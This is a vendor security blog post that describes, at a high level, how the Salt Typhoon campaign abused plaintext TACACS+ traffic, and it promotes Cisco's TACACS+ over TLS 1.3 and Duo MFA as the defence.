Modernizing TACACS+: Why Full-Session Encryption Matters More Than Ever

Protect your network from Salt Typhoon-style attacks. Learn how Cisco ISE 3.4 uses TACACS+ over TLS 1.3 and Duo MFA to provide full-session encryption.

February 24, 2026 Leave a Comment

Security

Modernizing TACACS+: Why Full-Session Encryption Matters More Than Ever

4 min read

Tal Surasky

A cybersecurity campaign by Salt Typhoon, a sophisticated group of threat actors believed to be state-sponsored, revealed a chilling reality: attackers don’t always need exploits to breach critical infrastructure. Instead, they used stolen credentials and protocol weaknesses to blend in seamlessly.

Here’s how their playbook unfolded, based on reports from Cisco Talos and other sources:

• Target Administrators: Attackers focused on network operators with high privileges to, managing routers, switches, and firewalls to read configuration files.

• Harvest TACACS+ Traffic: Traditional TACACS+ obfuscates only the password field, leaving usernames, authorization messages, accounting exchanges, and commands in plaintext, vulnerable to interception.

• Steal Credentials: Attackers captured TACACS+ traffic to extract passwords (crackable offline) and other sensitive data, such as device configurations, to enable unauthorized access.

• Exfiltrate Data: TACACS+ sessions and device configurations were quietly collected and sent offshore for analysis, masquerading as normal admin traffic.

• Blend in as Admins: By elevating their privileges using stolen credentials, attackers authenticated like legitimate administrators, issuing commands and generating logs that appeared routine.

• Evade Detection: By analyzing plaintext accounting data, attackers understood log patterns and cleared traces (e.g., .bash history, auth.log) to cover their tracks.

• Move Laterally and Persist: Over months or years, they expanded access across devices, maintaining durable footholds in critical infrastructure.

The cleverness of the campaign wasn’t breaking the system. It was living inside the system by abusing weaknesses in an outdated protocol

The campaign’s success lay in exploiting TACACS+’s outdated security model, turning routine admin traffic into a goldmine for attackers.

The Legacy Problem: TACACS+ in a Modern Threat Environment

TACACS+ has been a cornerstone of device administration for decades, providing authentication, authorization, and accounting (AAA). However, its design reflects a pre-Zero Trust era:

• Limited Encryption: Only the password field is encrypted; usernames, commands, authorization replies, and accounting data remain in plaintext.

• Replay Risk: Without cryptographic session binding, captured TACACS+ traffic could theoretically be reused to authenticate or execute commands, though specific evidence of this in Salt Typhoon is limited.

• Predictable Logs: Plaintext accounting messages allow attackers to study and anticipate log entries, aiding evasion tactics like log clearing.

• Trusted-Network Assumption: TACACS+ was built for internal networks, not modern environments with remote access or untrusted connections.

These flaws make TACACS+ a liability in today’s threat landscape, where attackers exploit intercepted traffic to impersonate admins.

Why are replay attacks a concern?

While not explicitly confirmed in Salt Typhoon’s tactics, the risk of replay attacks in traditional TACACS+ is significant due to its lack of session-specific cryptographic protections:

• Authentication Replay: Captured authentication exchanges could potentially be reused to gain access.

• Authorization Replay: Stolen authorization tokens might allow attackers to execute privileged commands.

• Command Replay: Recorded command strings could be repeated to mimic legitimate admin actions.

This vulnerability stems from TACACS+’s absence of ephemeral keys or timestamps, making captured traffic appear valid. Salt Typhoon’s credential theft and log manipulation highlight how such weaknesses can be exploited to blend into normal operations.

Cisco’s Answer:  TACACS+ Over TLS 1.3

As part of our push to more resilient infrastructure Cisco has addressed these vulnerabilities with TACACS+ over TLS 1.3 in Cisco Identity Services Engine (ISE) 3.4 Patch 4 and later releases along with our network operating systems (IOS XE – 17.18.1, IOS XR – 25.3.1, NX OS – 10.6.1), delivering a robust, standards-based solution (RFC 9887) for securing device administration. This implementation leverages TLS 1.3 to provide:

• Full-Session Encryption: TACACS+ traffic - usernames, authorization replies, commands, and accounting data is strongly encrypted, eliminating plaintext exposure.

• Replay Protection: Ephemeral session keys ensure each exchange is unique and not vulnerable to replay attacks, rendering captured sessions useless.

• Modern Cipher Suites: TLS 1.3 uses secure, up-to-date ciphers, hardened against downgrade and interception attacks and ready for post-quantum ciphers as they become available.

This solution directly counters the vulnerabilities exploited by Salt Typhoon, such as plaintext data exfiltration and potential session reuse, ensuring admin traffic remains confidential and tamper-proof.

Cisco’s Answer:  TACACS+ Over TLS 1.3

Encryption secures data in transit, but stolen credentials remain a risk. Cisco’s ecosystem integrates Cisco ISE with Cisco Duo multi-factor authentication (MFA) to address this:

Duo MFA: Requires a second factor for device admin logins, neutralizing stolen or intercepted credentials.

Zero Trust Alignment: Continuous verification ensures that even valid credentials cannot be used without additional authentication, thwarting impersonation attempts or credential theft.

This combination strengthens administrative access controls, aligning with Zero Trust principles of never trusting and always verifying.

Cisco’s Answer:  TACACS+ Over TLS 1.3

Identity-based attacks, are increasingly common among nation-state and criminal actors. Rather than relying on exploits, attackers target protocols and credentials to gain persistent access. For organizations using traditional TACACS+:

• You risk exposing usernames, commands, and accounting data in plaintext.

• You are vulnerable to credential theft and potential session replay.

• Your logs can be studied and manipulated by attackers.

• You may not meet modern compliance standards, such as NIST 800-53, FIPS 140-3, or PCI DSS, which require strong encryption and authentication.

Cisco’s TACACS+ over TLS 1.3, combined with Duo MFA, offers a leading solution to secure device administration, supported by Cisco’s extensive experience in network security.

The Takeaway

Attackers like Salt Typhoon exploit weaknesses in outdated protocols to impersonate admins and persist undetected. Traditional TACACS+ leaves critical data exposed and vulnerable.

With Cisco ISE 3.4 Patch 4 and Duo MFA, you can:

• Encrypt TACACS+ traffic with TLS 1.3.

• Prevent credential theft and session replay.

• Block unauthorized access with MFA.

• Protect logs from analysis and tampering.

• Align with compliance requirements (e.g., NIST, FIPS, PCI DSS).

• Implement Zero Trust for device administration.

Security threats evolve rapidly. Your AAA strategy must keep pace. Cisco’s solution empowers you to secure your administrators and protect your infrastructure from sophisticated attacks.

[...]

Original source